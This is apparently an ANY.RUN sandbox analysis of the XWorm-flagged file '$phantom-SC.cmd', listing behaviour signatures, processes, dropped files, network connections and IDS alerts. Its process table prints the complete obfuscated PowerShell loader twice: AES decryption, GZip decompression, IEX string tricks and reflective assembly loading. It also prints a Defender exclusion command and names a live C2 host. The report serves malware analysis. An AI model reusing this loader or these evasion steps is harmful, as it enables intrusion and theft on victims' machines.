| File name: | $phantom-SC.cmd |
| Full analysis: | https://app.any.run/tasks/46060e0b-d192-42b3-a5a8-0dfe17398769 |
| Verdict: | Malicious activity |
| Threats: | XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails. |
| Analysis date: | September 13, 2024, 18:31:42 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (57481), with CRLF line terminators |
| MD5: | C64388B6E6F8AFF6DB6EB8620DFC89EF |
| SHA1: | 05002CAF6C5171A4058D6DED2985DD184A59E9C6 |
| SHA256: | 1E86107969DF6CA8D82B09C224DE7A49C6CC162A86B38ACA58889479EAA1DC5A |
| SSDEEP: | 6144:Ni2J1CGoAfojc7iIUPm4xqxoaHBxh6vZfws4AmmHKqnKa8/cT:FJ1sAf/7iIUVxqhLhw54A5H1KPET |
MALICIOUS
Dynamically loads an assembly (POWERSHELL)
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Adds path to the Windows Defender exclusion list
- powershell.exe (PID: 488)
Create files in the Startup directory
- powershell.exe (PID: 488)
XWORM has been detected (SURICATA)
- powershell.exe (PID: 488)
Connects to the CnC server
- powershell.exe (PID: 488)
SUSPICIOUS
Cryptography encrypted command line is found
- cmd.exe (PID: 232)
- cmd.exe (PID: 4880)
Executing commands from ".cmd" file
- cmd.exe (PID: 5724)
- powershell.exe (PID: 2268)
- cmd.exe (PID: 1288)
Application launched itself
- cmd.exe (PID: 5724)
- cmd.exe (PID: 1288)
- powershell.exe (PID: 488)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 5724)
- powershell.exe (PID: 2268)
- cmd.exe (PID: 1288)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 5724)
- powershell.exe (PID: 488)
- cmd.exe (PID: 1288)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Script adds exclusion path to Windows Defender
- powershell.exe (PID: 488)
Connects to unusual port
- powershell.exe (PID: 488)
Contacting a server suspected of hosting an CnC
- powershell.exe (PID: 488)
INFO
The process uses the downloaded file
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Checks current location (POWERSHELL)
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Gets data length (POWERSHELL)
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Uses string replace method (POWERSHELL)
- powershell.exe (PID: 2268)
- powershell.exe (PID: 488)
Checks if a key exists in the options dictionary (POWERSHELL)
- powershell.exe (PID: 1184)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 1184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
136
Monitored processes
11
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 232 | C:\WINDOWS\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('lYjpdiHPd4+DZ6c8c/kntc0ZQld56S7IBanRp0g9OkQ='); $aes_var.IV=[System.Convert]::FromBase64String('rZUPRYTjmdN6V1CSfHDzDw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$AuDzc=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$YVoRi=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$skvxS=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($AuDzc, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $skvxS.CopyTo($YVoRi); $skvxS.Dispose(); $AuDzc.Dispose(); $YVoRi.Dispose(); $YVoRi.ToArray();}function execute_function($param_var,$param2_var){ IEX '$nuiWa=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$XfVWz=$nuiWa.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$XfVWz.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$UsyJu = 'C:\Users\admin\Desktop\$phantom-SC.cmd';$host.UI.RawUI.WindowTitle = $UsyJu;$sFZiu=[System.IO.File]::ReadAllText($UsyJu).Split([Environment]::NewLine);foreach ($XWpBT in $sFZiu) { if ($XWpBT.StartsWith('LJeSlTtqqGquSqwRCHGp')) { $GsoWu=$XWpBT.Substring(20); break; }}$payloads_var=[string[]]$GsoWu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); " | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 488 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1184 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1288 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\$phantom-SC.cmd" " | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2232 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2256 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2268 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4880 | C:\WINDOWS\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('lYjpdiHPd4+DZ6c8c/kntc0ZQld56S7IBanRp0g9OkQ='); $aes_var.IV=[System.Convert]::FromBase64String('rZUPRYTjmdN6V1CSfHDzDw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$AuDzc=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$YVoRi=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$skvxS=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($AuDzc, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $skvxS.CopyTo($YVoRi); $skvxS.Dispose(); $AuDzc.Dispose(); $YVoRi.Dispose(); $YVoRi.ToArray();}function execute_function($param_var,$param2_var){ IEX '$nuiWa=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$XfVWz=$nuiWa.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$XfVWz.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$UsyJu = 'C:\Users\admin\Desktop\$phantom-SC.cmd';$host.UI.RawUI.WindowTitle = $UsyJu;$sFZiu=[System.IO.File]::ReadAllText($UsyJu).Split([Environment]::NewLine);foreach ($XWpBT in $sFZiu) { if ($XWpBT.StartsWith('LJeSlTtqqGquSqwRCHGp')) { $GsoWu=$XWpBT.Substring(20); break; }}$payloads_var=[string[]]$GsoWu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); " | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5724 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\$phantom-SC.cmd" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6008 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
16 087
Read events
16 087
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
2
Text files
7
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2268 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | binary | |
MD5:4EE29E3BC841FDB02F32500F1D6458B3 | SHA256:E681AC3AA540FB2BD1EEAE0301199D9BD8684035EA4F260DCAD2AF405F29E516 | |||
| 2268 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vncrnn5n.ukg.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 488 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zisoq4bd.5fc.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 488 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$phantom-SC.cmd | text | |
MD5:C64388B6E6F8AFF6DB6EB8620DFC89EF | SHA256:1E86107969DF6CA8D82B09C224DE7A49C6CC162A86B38ACA58889479EAA1DC5A | |||
| 1184 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_15205ylx.yki.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 488 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jgcoiikx.o15.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1184 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3w5edei5.qrh.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2268 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yz51mdzo.vij.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1184 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:2743CECE806561B6F0B2A477A30D79B0 | SHA256:65B9822603EC53D47B7EE376145D3F78A0F10D35F0408805E0445B807324D9C6 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
17
DNS requests
10
Threats
14
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2400 | svchost.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2768 | SIHClient.exe | GET | 200 | 173.223.117.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
2768 | SIHClient.exe | GET | 200 | 173.223.117.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2400 | svchost.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
3888 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2400 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
488 | powershell.exe | 199.127.62.226:115 | korkos.now-dns.net | RELIABLESITE | US | malicious |
2768 | SIHClient.exe | 13.85.23.86:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2768 | SIHClient.exe | 173.223.117.131:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted |
2768 | SIHClient.exe | 52.165.164.15:443 | fe3cr.delivery.mp.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
korkos.now-dns.net |
| malicious |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2256 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.now-dns .net Domain |
13 ETPRO signatures available at the full report